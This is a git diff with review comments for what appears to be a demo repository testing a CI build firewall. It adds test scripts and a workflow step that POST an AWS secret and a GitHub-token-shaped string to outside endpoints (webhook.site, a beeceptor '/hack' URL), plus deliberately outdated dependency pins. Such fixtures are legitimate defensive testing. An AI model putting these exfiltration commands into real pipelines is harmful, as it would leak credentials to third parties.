diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
new file mode 100644
index 0000000..b7336dd
--- /dev/null
+++ b/.github/workflows/build.yml
@@ -0,0 +1,43 @@
+name: JavaScript Project
+
+on:
+ workflow_dispatch:
+
+permissions:
+ checks: write
+ contents: write
+ packages: read
+
+jobs:
+ python-application-build:
+ runs-on: ubuntu-latest
+ name: Run build
+ steps:
+ - name: Setup PSE
+ uses: invisirisk/pse-action@dev-test
+ with:
+ api_url: "https://app.stage.invisirisk.com"
+ app_token: ${{ secrets.IR_API_KEY }}
+
+ - name: Use npm
+ uses: actions/setup-node@v4
+ with:
+ node-version: "18"
+
+ - name: Install dependencies
+ run: npm install --legacy-peer-deps
+
+ #- name: 😈 Execute malicious script
+ # run: bash run_malicious_scripts.sh
+
+ - name: Send AWS Secret via Webhook (test)
+ run: |
+ curl -X POST "https://webhook.site/59c8292c-2297-4149-ac29-c02bec44a27a" \
+ --data-urlencode "aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}"
+
+
+ - name: Cleanup PSE
+ if: always()
+ uses: invisirisk/pse-action@dev-test
+ with:
+ cleanup: "true"
diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
deleted file mode 100644
index 9d57c51..0000000
--- a/.github/workflows/main.yml
+++ /dev/null
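Review bot: The job never checks out the repository, so `npm install --legacy-peer-deps` runs against an empty workspace and the commented-out `bash run_malicious_scripts.sh` step would fail with "No such file" if it were re-enabled; add `- uses: actions/checkout@v4` before the "Use npm" step. `contents: write` is wider than any step in this hunk needs (only the push test in Malicious_scripts/push.sh, which is not invoked here, would need it), so `contents: read` is the right grant until that test is wired in. The "Send AWS Secret via Webhook (test)" step forwards `secrets.AWS_SECRET_ACCESS_KEY` to a third-party endpoint, so the repository secret must hold a throwaway value and the step should say so, e.g. `# negative test: egress is expected to be blocked by PSE; the secret is a dummy value` — the page does not show what the secret contains, so that needs confirming. Both `invisirisk/pse-action@dev-test` references are mutable branch refs; pin them to a release tag or commit SHA, as the README's `@v1.0.20` examples do.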
@@ -1,96 +0,0 @@
-
-name: Build NPM Package
-on:
- push:
- branches: [ main ]
- pull_request:
- branches: [ main ]
-
-permissions:
- checks: write
- contents: read
- packages: read
-env:
- API_URL: https://app.audit.dev.invisirisk.com
-
-jobs:
- create_scan_in_IR_Portal:
- runs-on: ubuntu-latest
- outputs:
- scan_id: ${{ steps.parseResponse.outputs.scan_id }}
- steps:
- - name: Initiating SBOM Scan
- id: createScan
- uses: fjogeleit/http-request-action@v1.15.1
- with:
- url: '${{env.API_URL}}/utilityapi/v1/scan'
- method: 'POST'
- data: '{"api_key": "${{secrets.VB_API_KEY}}"}'
- - name: Parse Response
- id: parseResponse
- run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT"
- ecr_details:
- runs-on: ubuntu-latest
- outputs:
- ecr_username: ${{steps.ecr_details.outputs.username}}
- ecr_token: ${{steps.ecr_details.outputs.token}}
- ecr_region: ${{steps.ecr_details.outputs.region}}
- ecr_id: ${{steps.ecr_details.outputs.registry_id}}
- steps:
- - name: Fetching VB Token
- id: fetchECRDetails
- uses: fjogeleit/http-request-action@v1.15.1
- with:
- url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}'
- method: 'GET'
- - name: Decoding VB Token
- id: parseToken
- run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT"
- - name: ECR Details
- id: ecr_details
- run: |
- echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT"
- echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT"
- echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT"
- echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT"
-
- start_proxy_and_build:
- runs-on: ubuntu-latest
- needs: [create_scan_in_IR_Portal, ecr_details]
- services:
- pse:
- image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test
- credentials:
- username: ${{needs.ecr_details.outputs.ecr_username}}
- password: ${{needs.ecr_details.outputs.ecr_token}}
- env:
- PSE_DEBUG_FLAG: --alsologtostderr
- POLICY_LOG: t
- INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}}
- INVISIRISK_PORTAL: https://app.audit.dev.invisirisk.com/
- GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- container:
- image: node:18-alpine
- options: --cap-add=NET_ADMIN
- strategy:
- matrix:
- node-version: [18.x]
- steps:
- - env:
- SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
- run: echo $SCAN_ID
- - uses: invisirisk/pse-action@v1.0.8
- with:
- github-token: ${{ secrets.GITHUB_TOKEN }}
- SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
- - name: Checkout the code
- uses: actions/checkout@v3
- - name: Use Node.js ${{ matrix.node-version }}
- uses: actions/setup-node@v3
- with:
- node-version: ${{ matrix.node-version }}
- - run: npm install
- - run: npm ci
- - run: npm run build --if-present
- - run: npm test
-
diff --git a/Malicious_scripts/mimetype.sh b/Malicious_scripts/mimetype.sh
new file mode 100644
index 0000000..486795d
--- /dev/null
+++ b/Malicious_scripts/mimetype.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+
+curl -H "Accept: text/html" -o google.html "https://www.google.com"
diff --git a/Malicious_scripts/push.sh b/Malicious_scripts/push.sh
new file mode 100644
index 0000000..8bd4525
--- /dev/null
+++ b/Malicious_scripts/push.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+echo "Marking repository as safe..."
+git config --global --add safe.directory "$GITHUB_WORKSPACE"
+
+echo "Setting up Git user..."
+git config user.name "ir-paras-oli"
+git config user.email "paras.oli@invisirisk.com"
+
+echo "Making changes (creating a file)..."
+echo "Some new content" > new6-file.txt
+git add new6-file.txt
+git commit -m "Add a new file"
+
+echo "Pushing changes to the STAGE branch..."
+git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git
+git push origin STAGE
diff --git a/Malicious_scripts/run_wrapper.sh b/Malicious_scripts/run_wrapper.sh
new file mode 100644
index 0000000..b6e5e2e
--- /dev/null
+++ b/Malicious_scripts/run_wrapper.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+echo "Starting leak_token.sh execution..."
+bash ./secret_leak.sh # Call the actual script
+bash ./statuscode.sh # Call the actual script
+bash ./push.sh # Call the actual script
+bash ./mimetype.sh # Call the actual script
+echo "Execution completed."
diff --git a/Malicious_scripts/secret_leak.sh b/Malicious_scripts/secret_leak.sh
new file mode 100644
index 0000000..f1980ce
--- /dev/null
+++ b/Malicious_scripts/secret_leak.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+# Sending a POST request with a GitHub token (LEAK)
+curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
+ -H "Content-Type: application/json" \
+ -d '{
+ "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+ }'
diff --git a/Malicious_scripts/statuscode.sh b/Malicious_scripts/statuscode.sh
new file mode 100644
index 0000000..bec9161
--- /dev/null
+++ b/Malicious_scripts/statuscode.sh
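Review bot: `${{ secrets.GITHUB_TOKEN }}` and `${{ github.repository }}` on the `git remote set-url` line are GitHub Actions expression syntax, which is only expanded inside a workflow file, not inside a standalone bash script; bash reports `${{` as a bad substitution, so the remote is never rewritten and the push test does not exercise what it is meant to. Read the values from the environment instead, `git remote set-url origin "https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git"`, with `GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}` set in the calling step's `env:` (`GITHUB_REPOSITORY` is already provided by the runner). Since this persists the token in `.git/config` for the rest of the job, a comment stating that the fixture is only meant for ephemeral runners would be worth adding above that line. The script also has no `set -e`, so a failed `git commit` (for example when `new6-file.txt` already exists unchanged) still falls through to `git push`.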
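Review bot: The four `bash ./x.sh` calls resolve relative to the caller's working directory, so the wrapper only works when invoked from inside `Malicious_scripts/`; `cd "$(dirname "$0")"` as the first command after the shebang would make it location-independent. Each child's exit status is discarded, so "Execution completed." is printed even when a request is blocked or a script is missing, which makes the log useless for telling whether the firewall intervened; either add `set -e` or echo `$?` after each call. The opening echo mentions `leak_token.sh` but the script invoked is `secret_leak.sh`.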
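Review bot: The literal `ghp_…` string in the `-d` payload has the exact shape of a GitHub personal access token, so push protection and secret scanners will flag this file even if the value is fake; if it is a real token that was only partially masked it should be revoked, and either way a comment such as `# fake token (ends in XXX), never a live credential` above the payload would record the intent. `curl -k` disables certificate verification for `vbirmock.free.beeceptor.com`; if that is there to tolerate the PSE proxy's certificate, say so in a comment, otherwise drop the flag so a mis-issued certificate is not silently accepted. The same `-k` question applies to statuscode.sh.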
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+echo "Checking status code from GitHub API..."
+
+# This request should trigger a 400 Bad Request because 'q' is empty
+curl -k -i -X GET "https://api.github.com/search/repositories?q="
+
+# This request should trigger a 401 Unauthorized if authentication is required but not provided
+# curl -k -i -X GET "https://api.github.com/user"
+
+echo "Status check completed."
diff --git a/README.md b/README.md
index ed8b0f0..d687843 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,55 @@
-readme
-readme
+# InvisiRisk Build Application Firewall Demo
+
+This repository contains a JavaScript application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a JavaScript environment.
+
+## GitHub Workflow Setup
+
+To integrate InvisiRisk into your GitHub workflow, add the following steps to each job in your workflow file:
+
+### 1. Add the Setup PSE step at the beginning of each job:
+
+```yaml
+- name: Setup PSE
+ uses: invisirisk/pse-action@v1.0.20
+ with:
+ api_url: "https://app.invisirisk.com"
+ app_token: ${{ secrets.IR_API_KEY }}
+```
+
+### 2. Add the Cleanup PSE step at the end of each job:
+
+```yaml
+- name: Cleanup PSE
+ if: always()
+ uses: invisirisk/pse-action@v1.0.20
+ with:
+ cleanup: "true"
+```
+
+### 3. Set up the required secret:
+
+You need to set the IR_API_KEY secret in your GitHub repository settings. This API key can be obtained from the InvisiRisk portal.
+
+### Example workflow:
+
+```yaml
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+
+ - name: Setup PSE
+ uses: invisirisk/pse-action@v1.0.20
+ with:
+ api_url: "https://app.invisirisk.com"
+ app_token: ${{ secrets.IR_API_KEY }}
+
+ # Your other build steps here
+
+ - name: Cleanup PSE
+ if: always()
+ uses: invisirisk/pse-action@v1.0.20
+ with:
+ cleanup: "true"
+```
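Review bot: The script announces "Checking status code" but never captures one: `curl -i` dumps the response headers to stdout and the request's exit status is ignored, so the log does not show whether the proxy passed the request through, answered with its own status, or blocked it. `curl -k -s -o /dev/null -w '%{http_code}\n' "https://api.github.com/search/repositories?q="` would print exactly the code the comment above it says to expect, which is what a fixture should leave in the log. The expectation in the comment ("should trigger a 400 Bad Request") is an inference about the upstream API rather than something the script verifies, so it is worth confirming against the actual response once the code is printed.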
diff --git a/mern-social-second-edition/README.md b/mern-social-second-edition/README.md
deleted file mode 100644
index 33664e2..0000000
--- a/mern-social-second-edition/README.md
+++ /dev/null
@@ -1,58 +0,0 @@ -# MERN Social 2.0 -- *Looking for the first edition code? [Check here](https://github.com/shamahoque/mern-social/tree/master)* - -A simple social media application with users, posts, likes and comments - developed using React, Node, Express and MongoDB. - -![MERN Social](https://s3.amazonaws.com/mernbook/git+/social.png "MERN Social") - -### [Live Demo](http://social2.mernbook.com/ "MERN Social") - -#### What you need to run this code -1. Node (13.12.0) -2. NPM (6.14.4) or Yarn (1.22.4) -3. MongoDB (4.2.0) - -#### How to run this code -1. Make sure MongoDB is running on your system -2. Clone this repository -3. Open command line in the cloned folder, - - To install dependencies, run ``` npm install ``` or ``` yarn ``` - - To run the application for development, run ``` npm run development ``` or ``` yarn development ``` -4. Open [localhost:3000](http://localhost:3000/) in the browser ----- -### More applications built using this stack - -* [MERN Skeleton](https://github.com/shamahoque/mern-social/tree/second-edition) -* [MERN Classroom](https://github.com/shamahoque/mern-classroom) -* [MERN Marketplace](https://github.com/shamahoque/mern-marketplace/tree/second-edition) -* [MERN Expense Tracker](https://github.com/shamahoque/mern-expense-tracker) -* [MERN Mediastream](https://github.com/shamahoque/mern-mediastream/tree/second-edition) -* [MERN VR Game](https://github.com/shamahoque/mern-vrgame/tree/second-edition) - -Learn more at [mernbook.com](http://www.mernbook.com/) - ----- -## Get the book -#### [Full-Stack React Projects - Second Edition](https://www.packtpub.com/web-development/full-stack-react-projects-second-edition) -*Learn MERN stack development by building modern web apps using MongoDB, Express, React, and Node.js* - -Full-Stack React Projects - -React combined with industry-tested, server-side technologies, such as Node, Express, and MongoDB, enables you to develop and deploy robust real-world full-stack web apps. 
This updated second edition focuses on the latest versions and conventions of the technologies in this stack, along with their new features such as Hooks in React and async/await in JavaScript. The book also explores advanced topics such as implementing real-time bidding, a web-based classroom app, and data visualization in an expense tracking app. - -Full-Stack React Projects will take you through the process of preparing the development environment for MERN stack-based web development, creating a basic skeleton app, and extending it to build six different web apps. You'll build apps for social media, classrooms, media streaming, online marketplaces with real-time bidding, and web-based games with virtual reality features. Throughout the book, you'll learn how MERN stack web development works, extend its capabilities for complex features, and gain actionable insights into creating MERN-based apps, along with exploring industry best practices to meet the ever-increasing demands of the real world. - -Things you'll learn in this book: - -- Extend a MERN-based application to build a variety of applications -- Add real-time communication capabilities with Socket.IO -- Implement data visualization features for React applications using Victory -- Develop media streaming applications using MongoDB GridFS -- Improve SEO for your MERN apps by implementing server-side rendering with data -- Implement user authentication and authorization using JSON web tokens -- Set up and use React 360 to develop user interfaces with VR capabilities -- Make your MERN stack applications reliable and scalable with industry best practices - -If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1839215410) today! - ---- diff --git a/mern-social-second-edition/package.json b/mern-social-second-edition/package.json deleted file mode 100644 index 786815a..0000000 --- a/mern-social-second-edition/package.json +++ /dev/null 
@@ -1,63 +0,0 @@
-{
- "name": "mern-social",
- "version": "2.0.0",
- "description": "A MERN stack based social media application",
- "author": "Shama Hoque",
- "license": "MIT",
- "keywords": [
- "react",
- "express",
- "mongodb",
- "node",
- "mern"
- ],
- "repository": {
- "type": "git",
- "url": "https://github.com/shamahoque/mern-social.git"
- },
- "homepage": "https://github.com/shamahoque/mern-social",
- "main": "./dist/server.generated.js",
- "scripts": {
- "development": "nodemon",
- "build": "webpack --config webpack.config.client.production.js && webpack --mode=production --config webpack.config.server.js",
- "start": "NODE_ENV=production node ./dist/server.generated.js"
- },
- "engines": {
- "node": "13.12.0",
- "npm": "6.14.4"
- },
- "devDependencies": {
- "@babel/core": "7.9.0",
- "@babel/preset-env": "7.9.0",
- "@babel/preset-react": "7.9.4",
- "babel-loader": "8.1.0",
- "file-loader": "6.0.0",
- "nodemon": "2.0.2",
- "webpack": "4.42.1",
- "webpack-cli": "3.3.11",
- "webpack-dev-middleware": "3.7.2",
- "webpack-hot-middleware": "2.25.0",
- "webpack-node-externals": "1.7.2"
- },
- "dependencies": {
- "@hot-loader/react-dom": "16.13.0",
- "@material-ui/core": "4.9.8",
- "@material-ui/icons": "4.9.1",
- "body-parser": "1.19.0",
- "compression": "1.7.4",
- "cookie-parser": "1.4.5",
- "cors": "2.8.5",
- "express": "4.17.1",
- "express-jwt": "5.3.1",
- "formidable": "1.2.2",
- "helmet": "3.22.0",
- "jsonwebtoken": "8.5.1",
- "lodash": "4.17.15",
- "mongoose": "5.9.7",
- "react": "16.13.1",
- "react-dom": "16.13.1",
- "react-hot-loader": "4.12.20",
- "react-router": "5.1.2",
- "react-router-dom": "5.1.2"
- }
-}
diff --git a/package.json b/package.json
index 9507c1b..733556e 100644
--- a/package.json
+++ b/package.json
@@ -1,23 +1,57 @@
 {
- "name": "GeeksForGeeks",
+ "name": "javascript-project",
 "version": "1.0.0",
- "description": "GeeksForGeeks",
+ "description": "Demo JavaScript Project",
 "main": "index.js",
 "scripts": {
- "test": "echo \"test started \"",
- "start": "node start.js"
+ "start": "node index.js",
+ "test": "echo \"Error: no test specified\" && exit 1"
 },
- "engines": {
- "node": ">=7.6.0",
- "npm": ">=4.1.2"
- },
- "author": "GeeksForGeeks",
- "license": "ISC",
 "dependencies": {
- "body-parser": "^1.17.1",
- "express": "^4.15.2",
- "express-validator": "^3.1.2",
- "mongoose": "^4.8.7",
- "nodemon": "^1.14.12"
+ "express": "4.17.1",
+ "lodash": "4.17.20",
+ "mongoose": "5.9.2",
+ "body-parser": "1.19.0",
+ "cors": "2.8.5",
+ "dotenv": "8.2.0",
+ "jsonwebtoken": "8.3.0",
+ "helmet": "3.23.3",
+ "morgan": "1.10.0",
+ "bcryptjs": "2.4.3",
+ "moment": "2.24.0",
+ "request": "2.88.2",
+ "bluebird": "3.7.2",
+ "debug": "2.6.9",
+ "async": "3.2.0",
+ "winston": "3.2.1",
+ "multer": "1.4.2",
+ "nodemailer": "6.4.6",
+ "mysql": "2.18.1",
+ "pg": "8.2.1",
+ "redis": "3.0.2",
+ "socket.io": "2.3.0",
+ "uuid": "3.3.3",
+ "validator": "13.1.1",
+ "xml2js": "0.4.23",
+ "ini": "1.3.5",
+ "handlebars": "4.7.6",
+ "marked": "0.3.6",
+ "merge-deep": "3.0.2",
+ "minimist": "1.2.5",
+ "q": "1.5.1",
+ "underscore": "1.10.2",
+ "yargs-parser": "20.2.2",
+ "jquery": "3.5.1",
+ "xmlhttprequest": "1.8.0",
+ "lodash.merge": "4.6.2",
+ "lodash.defaultsdeep": "4.6.1",
+ "react": "16.13.1",
+ "react-dom": "16.13.1",
+ "axios": "0.19.2",
+ "next": "13.5.5",
+ "shelljs": "0.8.4",
+ "node-forge": "0.10.0",
+ "xml-js": "1.6.11",
+ "hoek": "5.0.3"
 }
 }
diff --git a/run_malicious_scripts.sh b/run_malicious_scripts.sh
new file mode 100644
index 0000000..deac8b2
--- /dev/null
+++ b/run_malicious_scripts.sh
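Review bot: The new dependency list pins 45 packages at versions that are several years old (`"lodash": "4.17.20"`, `"minimist": "1.2.5"`, `"handlebars": "4.7.6"`, `"request": "2.88.2"` — the last of which is deprecated upstream), and most of them (`mysql`, `pg`, `redis`, `socket.io`, `next`, `react-dom`) look unrelated to a single `index.js` entry point; presumably they exist to exercise the firewall's dependency checks, but nothing on the page says so. JSON carries no comments, so record that intent in README.md, and commit a `package-lock.json` so the fixture resolves to the same tree on every run instead of whatever `npm install --legacy-peer-deps` picks up. The removed `"engines"` block was the only place the Node version was constrained; a replacement such as `"engines": { "node": ">=18" }` matching the workflow's `node-version: "18"` would make the supported runtime explicit again, assuming the pinned packages do run on 18.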
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+echo "Starting malicious execution..."
+bash malicious_scripts/secret_leak.sh # Call the actual script
+bash malicious_scripts/status_code.sh # Call the actual script
+bash malicious_scripts/push.sh # Call the actual script
+bash malicious_scripts/mime_type.sh # Call the actual script
+bash malicious_scripts/content_length.sh # Call the actual script
+echo "Execution completed."
\ No newline at end of file
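Review bot: None of the five paths match the files this commit adds: the directory is `Malicious_scripts/` (capital M, and `ubuntu-latest` is case-sensitive), the scripts are `statuscode.sh` and `mimetype.sh` rather than `status_code.sh` and `mime_type.sh`, and `content_length.sh` does not exist anywhere in the diff, so every call fails with "No such file or directory" while the script still prints "Execution completed." and exits 0. Since `Malicious_scripts/run_wrapper.sh` already lists the same four scripts, this runner could delegate to it, or use the corrected names below; either way the `content_length.sh` call should be removed or the file added. The file also lacks a trailing newline.

```shell
# … unchanged: shebang and opening echo …
bash Malicious_scripts/secret_leak.sh
bash Malicious_scripts/statuscode.sh
bash Malicious_scripts/push.sh
bash Malicious_scripts/mimetype.sh
# … unchanged: closing echo …
```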